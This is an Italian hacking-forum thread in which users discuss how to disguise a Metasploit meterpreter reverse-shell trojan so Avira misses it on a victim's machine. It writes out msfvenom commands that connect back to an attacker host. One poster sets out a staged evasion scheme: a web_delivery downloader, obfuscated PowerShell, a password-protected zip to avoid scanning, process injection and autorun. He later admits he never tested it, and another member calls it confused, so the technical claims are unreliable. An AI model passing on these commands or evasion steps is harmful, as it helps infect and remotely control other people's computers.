Domanda Malware Mascheramento trojan contro Avira :D

[Eoloprox]

Ciao

Proviamo a capire come mascherare un trojan creato con il seguente comando:
---------------------------------------------------------------------------------------------------------------------------------------------
CREAZIONE:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -f exe > [file].exe
--------------------------------------------------------------------------------------------------------------------------------------------
ecco il trojan è pronto, volevo sapere se e piu conveniente mascherare il file, oppure inglobarlo in un altro software? O meglio ancora Inglobare un soft e mascheramento???

Comunque tutti i tentativi che ho fatto non mi escludono la rilevanza da AVIRA su macchina targhet....

Aspetto istruzioni su come creare un trojan a DOC...
Ciao a tutti

 

[Gorate]

Io penso che mascherare un trojan sia 50% parte del programmatore e 50% del rimbambito che lo apre.....
Io sinceramente ti consiglio di offuscare il codice, di inserirlo in una macro di un file word, che scarichi attraverso il vettore di diffusione [cosi' crei un trojan a 2 parti, la prima, cioe' quella che mandi alla vittima e' solo quello che serve per downloadare il vero malware ed eseguirlo sulla macchina target]; Poi il trojan [quindi la seconda parte del malware], lo inserisci dentro un programma contenuto in u file compresso zip protetto da password, che appena viene avviato lo script 1 [il vettore], viene unpacka e si esegue automaticamente, magari injectandosi nei processi per rimanere nascosto.
Cosi' non viene rilevato sin quando non infetta la macchina.
Se poi vuoi che non venga rilevato anche dopo aver aperto il trojan, ti consiglio di adottare un malwar cnc che adotti come cnc un servizio conosciuto, cosi' l antivirus non reputa dannoso il collegamento al sito

 

[Eoloprox]

scusa la mia ignoranza, ma potresti darmi i comandi per evitare che quella m***** di avira becchi il file?
Grazie 1000

 

[Gorate]

Allora, per cominciare, devi adottare l exploit web_delivery di metasploit [poi se te lo programmi tu e' megio perche' hai 100 possibilita' in meno che non lo scopra,comunque];
l exploit web_delivery, come ti dicevo, fa' in modo di creare un trojan in "2 parti": un downloader e la parte principale del malware.
Dopodiche' avrai 2 file [avvia apache2 per poterlo adottare, senno' il file li' e' nel server inattivo e li' rimane]; A qusto punto dovrai modificare il trojan "2" [cioe' il malware vero e proprio] con uno che crerai attravrso

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -x /percorso/applicazione.estensione -f ps1 > [file].ps1

Dopodiche', cioe' dopo che avrai modificato il nome del file con quello dello script che ti appare in powershell quando hai avviato web_delivery, si passa alla fase 2:
devi offuscare tutti e due i codici powershell [.ps1] , questo passaggio lo puoi fare cercando su google "powershell obfuscate/obfuscator", trovi centinaia di programini utili;
A questo punto, lo scipt ps1 che avevi ottnuto sempre con web_delivery [se non hai capito, io intendo quello che vedi come output prima che si aprra la sessione meta]
Ora devi inserire il file trojan [il numero 1,il principale,quello che verra' downlodato] in un zip con password e modifica lo script mettendo il source non come .ps1, ma come .zip [naturalmente caricalo sul server con il nome che inserisci nell script powershell citato sopra [il 2]] e cerca su google "extract zip file with password with powershell", troverai vari script che dovrai implementare per poter unzippare automaticamente il file protetto da password[che quindi non viene scannerizzato quando viene downloadato].
Converti il trojan da ps1 a exe cercando su google "from powershell to exe".
Dopodiche' manda lo script che ti appare appunto [quello che appunto ti appare prima della sessione] alla vittima, faglielo aprire e lei downloadera' il file che verra' unpackato, poi magari inserisci anche un bel autorun e hai fatto.

 

[Gorate]

Se non hai capito un tubo [ne sono convino perche' non so' esporre bene], vorrei rilasciare un tutorial proprio per farvi capire bene come fare, unica cosa mi serve capire come creare una risorsa o tutorial [una relase insomma]

 

[Eoloprox]

Rilascia il tutoria, sei un DRAGO!
Non aspettiamo altro dai!!!

 

[lorenzopalmiotto]

Se non hai capito un tubo [ne sono convino perche' non so' esporre bene], vorrei rilasciare un tutorial proprio per farvi capire bene come fare, unica cosa mi serve capire come creare una risorsa o tutorial [una relase insomma]

Seguo per il tutorial

Inviato dal mio Nexus 5 utilizzando Tapatalk

 

[Яǝʌǝɹsǝ]

manda lo script che ti appare appunto [quello che appunto ti appare prima della sessione] alla vittima, faglielo aprire e lei downloadera' il file che verra' unpackato

macchè..
tanto per capirci, per il web_delivery devi avere già un controllo del sistema. poi, sia il server che il payload sono sulla macchina tua. download di quale file stai parlando?

 

[Gorate]

Raga, ma da dove creo una guida? da https://www.inforge.net/xi/resources/ e "crea nuova relase" o basta che faccio un nuovo post con scrittto guida e ho fatto?

PS: al momento sono molto impegnato con scuola e roba varia, per questo per evitare di fare uno schifo di tutorial ci impieghero' parecchio

 

[chimero]

Raga, ma da dove creo una guida? da https://www.inforge.net/xi/resources/ e "crea nuova relase" o basta che faccio un nuovo post con scrittto guida e ho fatto?

PS: al momento sono molto impegnato con scuola e roba varia, per questo per evitare di fare uno schifo di tutorial ci impieghero' parecchio

Per creare una nuova release, devi cliccare su "Crea nuova release", scrivi quel che vuoi e poi il gioco è fatto. Il sistema ti crea già una discussione sulla tua release. Correggetemi se sbaglio.

 

[Gorate]

macchè..
tanto per capirci, per il web_delivery devi avere già un controllo del sistema. poi, sia il server che il payload sono sulla macchina tua. download di quale file stai parlando?

L'exploit web_delivery non ha bisogno di una sessione aperta sulla mcchina vittima: crea uno script in php,powershell o pythn che se eseguito dalla vittima fa' downloadare il malware vero e proprio.
Io intendo appunto il download del malware che uno rimpiazza nello script;
Scusate ma non sono bravo a spiegarmi, comunque appena ho un po' di tempo libero e finisce sta m**** di scuola vi mando il tutto ben fatto

 

[lorenzopalmiotto]

L'exploit web_delivery non ha bisogno di una sessione aperta sulla mcchina vittima: crea uno script in php,powershell o pythn che se eseguito dalla vittima fa' downloadare il malware vero e proprio.
Io intendo appunto il download del malware che uno rimpiazza nello script;
Scusate ma non sono bravo a spiegarmi, comunque appena ho un po' di tempo libero e finisce sta m**** di scuola vi mando il tutto ben fatto

Che scuola fai, l'informatico?

Inviato dal mio Nexus 5 utilizzando Tapatalk

 

[Gorate]

Che scuola fai, l'informatico?

Inviato dal mio Nexus 5 utilizzando Tapatalk

Lo scientifico

 

[Яǝʌǝɹsǝ]

crea uno script in php,powershell o pythn che se eseguito dalla vittima fa' downloadare il malware vero e proprio

guarda che sei più confuso di Lapo. di quale download stai parlando se il payload sta sul server che devi creare? e senza l'esecuzione del comando(nel caso di windows è powershell.exe) non parte niente? quindi senza una sessione, voglio vedere come spieghi alla vittima di aprire cmd e di inserire il comando di powershell o di php

 

[Gorate]

guarda che sei più confuso di Lapo. di quale download stai parlando se il payload sta sul server che devi creare? e senza l'esecuzione del comando(nel caso di windows è powershell.exe) non parte niente? quindi senza una sessione, voglio vedere come spieghi alla vittima di aprire cmd e di inserire il comando di powershell o di php

Appunto: lo script lo mandi alla vittima in qualche modo, sei tu che devi trovare il modo di farglielo eseguire, magari anche involontariamente sulla sua macchina;
Inoltre, per la cosa del download non so' come spiegartelo, in verita' non ho capito neanche cosa intendi, lol.

 

[Яǝʌǝɹsǝ]

ci credo che non hai capito. magari la smetti di dire pazzate ai utenti che capiscono poco..

 

[Gorate]

Visualizza allegato 22091
ci credo che non hai capito. magari la smetti di dire pazzate ai utenti che capiscono poco..

Mi sembra che e' la stessa cosa che ho detto io.....:

lo script lo mandi alla vittima in qualche modo, sei tu che devi trovare il modo di farglielo eseguire, magari anche involontariamente sulla sua macchina;

Comunque tutto quello che ho detto e' solo in linea teorica, non lo ho mai provato, ma dovrbbe fungere, vedro' appena posso di fare il tutorial

 

[Яǝʌǝɹsǝ]

non lo ho mai provato

ah.. ecco